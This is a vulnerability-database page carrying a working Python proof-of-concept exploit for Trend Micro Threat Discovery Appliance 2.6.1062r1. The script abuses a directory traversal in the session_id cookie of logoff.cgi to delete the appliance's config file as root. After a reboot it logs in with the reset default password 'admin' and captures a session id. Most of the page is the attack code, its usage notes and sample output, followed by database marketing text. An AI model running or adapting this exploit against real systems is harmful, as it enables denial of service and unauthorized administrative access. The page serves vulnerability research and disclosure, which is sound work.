Vulners
Lucene search
Trend Micro Threat Discovery Appliance 2.6.1062r1 logoff.cgi Directory Traversal Exploit
10
#!/usr/local/bin/python
"""
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/
File: TDA_InstallationCD.2.6.1062r1.en_US.iso
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1
Summary:
========
There exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root.
This can result in an attacker causing a DoS or bypassing authentication.
Exploitation:
=============
An attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'.
1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf
2. Wait for the server to be rebooted...
It is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby
no-body can even login... (since the md5 hashed pw is stored in the config file).
Notes:
======
- (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience)
- No username required!
Example:
========
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py
(+) usage: ./poc.py <target> <option [reset][login]>
(+) eg: ./poc.py 172.16.175.123 reset
(+) eg: ./poc.py 172.16.175.123 login
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login
(-) login failed
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset
(+) resetting the default password...
(+) success! now wait for a reboot...
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login
(+) logged in...
(+) authenticated session_id: de685c4feec6d698f8165a8af8489df1
"""
import re
import os
import sys
import time
import requests
import threading
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 3:
print "(+) usage: %s <target> <option [reset][login]>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 reset" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 login" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
o = sys.argv[2]
bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
o_url = "%scgi-bin/logoff.cgi" % bu
if o.lower() == "login":
# default password
r = requests.post(l_url, data={ "passwd":"admin", "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
print "(+) logged in..."
match = re.search("session_id=(.*); path", r.headers['set-cookie'])
if match:
print "(+) authenticated session_id: %s" % match.group(1)
else:
print "(-) login failed"
elif o.lower() == "reset":
print "(+) resetting the default password..."
r = requests.get(o_url, cookies={"session_id":"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"}, verify=False)
# causes an uninitialized free() vulnerability as well...
if "Memory map" in r.text:
print "(+) success! now wait for a reboot..."
else:
print "(-) not a valid option!"
# 0day.today [2018-04-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Apr 2017 00:00Current
9.4High risk
Vulners AI Score9.4
EPSS0.92979